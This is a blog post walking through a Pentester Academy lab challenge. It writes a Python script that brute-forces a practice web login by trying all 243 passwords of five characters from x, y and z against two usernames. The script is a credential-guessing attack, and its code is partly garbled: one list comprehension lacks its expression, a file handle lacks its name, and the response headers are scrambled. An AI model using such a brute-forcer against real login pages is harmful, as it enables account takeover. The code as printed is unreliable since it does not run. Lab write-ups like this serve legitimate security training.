الثلاثاء، 29 أكتوبر 2013

securitytube (pentester academy) Challenge 1 Solution

 Hello Guys, 

I'm gonna show u how I could solve the challenge 1 of securitytube challenges by writing a simple python script . 

Firstly Let's have a look on the challenge (url Below) : 


ok it gives us some hints : 



Hint:
  1. Company Domain: PentesterAcademy.com
  2. Usernames: jack, admin
  3. Password Complexity: 5 characters and uses only x,y,z lowercase. Password examples - xxyyz, xyzxy, xyxxx etc.
ok as shown in hints it gives us  a combination of passwords and 2 usernames it seems to be brute force attack on a form :) 

so with a simple calculation the password would be a combination of three letters only (x , y and z ) with a length of 5 characters , so number of probabilities would be ( 3 ^ 5 ) = 243 probability and we have 2 usernames , so number of tries will be done on this form is (243 * 2  = 486)  try .

ok let's start coding our script to brute force on this form : 

I'm gonna use (urllib2) to connect to a web page -> 

  1. #!/usr/bin/env python
  2. import urllib2
  3. response = urllib2.urlopen('http://pentesteracademylab.appspot.com//lab/webapp/auth/1/login')
  4. print response.info()
  5. # do something
  6. response.close()
this code will give us and output 
  1. Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache
    te: Wed, 16 Oct 2013
    Vary: Accept-Encoding D a14:59:24 GMT Server: Google Frontend
    : close
    Alternate-Protocol: 80:quic Connectio
    n
it's the header info , so connection successfully done .

Now we need to generate 243 probability of password

  1. your_list = 'xyz'
  2. complete_list = []
  3. for current in xrange(5):
  4.     a = [for i in your_list]
  5.     for y in xrange(current):
  6.         a = [x+i for i in your_list for x in a]
  7.     complete_list = complete_list+a

this code will generate combination from length (1 to 5 ) so we need to split it and extract only combination for 5 chars length .

  1. chunk = complete_list[120:363]
  2. print chunk
  3. print len(chunk)
 the output for chunck will be (243) . Cool :)

now let's make a list for users

  1. username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']

ok now we created a list for password and usernames . we need to make connection for the vulnerable app and try to connect with generated passwords and usernames .

We need to make a for loop for passwords
  1. for pw in chunk:

and we'll make another for loop for usernames under the first loop
  1.         for x in username:

then we'll print every single try for username and password
  1.                 trying =  "Trying with Username \t"+ x +"\t password "+pw + "\n"

and as we know that the url for vulnerable app is
  1. ('http://pentesteracademylab.appspot.com/lab/webapp/1?email=username&password=password)
so we will replace username parameter with x variable and password with pw variable

  1.                 url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)

that's good , our script now will send requests to the form and try with generated username and password but we didn't get the response yet ! . we need to know if the username and password is right or incorrect . so we'll put in these lines of codes
  1.                 request = urllib2.Request(url)
  2.                 response = urllib2.urlopen(request)
  3.                 back = response.read()[2486:2492]

Attention :  for the line 
  1.                 back = response.read()[2486:2492]
when u get the  response you need to specify the line which tells you if the password is right or incorrect

if you tried to put


  1.                 back = response.read()


         print back


the output will be the whole page :



So , we need to split it from the char 2486 to 2492 and it's the word "failed" . 
we'll check if every output from the page is failed or not

  1.                 print back
                    if(back!="Failed"):
  2.                         cprint  ("Success With Username " +x+ "& Password " + pw ,'red')

and successfully the challenge solved ! :D

here's the whole code

  1. #!/usr/bin/env  python
  2. '''
  3. Brute Force On Challenge 1
  4. Ahmed Sherif
  5. '''
  6. import urllib2
  7. import os
  8. from termcolor  import cprint,colored
  9. your_list = 'xyz'
  10. complete_list = []
  11. for current in xrange(5):
  12.     a = [for i in your_list]
  13.     for y in xrange(current):
  14.         a = [x+i for i in your_list for x in a]
  15.     complete_list = complete_list+a
  16. chunk = complete_list[120:363]
  17. print chunk
  18. print len(chunk)
  19. = open('myfile3.txt', 'w')
  20. username = ['jack@pentesteracademy.com','admin@pentesteracademy.com']
  21. for pw in chunk:
  22.         for x in username:
  23.        
  24.                 trying =  "Trying with Username \t"+ x +"\t password "+pw + "\n"
  25.                 print   trying
  26.                 url = ('http://pentesteracademylab.appspot.com/lab/webapp/1?email='+x+'&password='+pw)
  27.                 request = urllib2.Request(url)
  28.                 response = urllib2.urlopen(request)
  29.                 back = response.read()[2486:2492]
  30.                 print back
  31.                 f.write(trying + back + "\n")
  32.                 if(back!="Failed"):
  33.                         cprint  ("Success With Username " +x+ "& Password " + pw ,'red')
  34.                        
  35. f.close()
or you can download it from here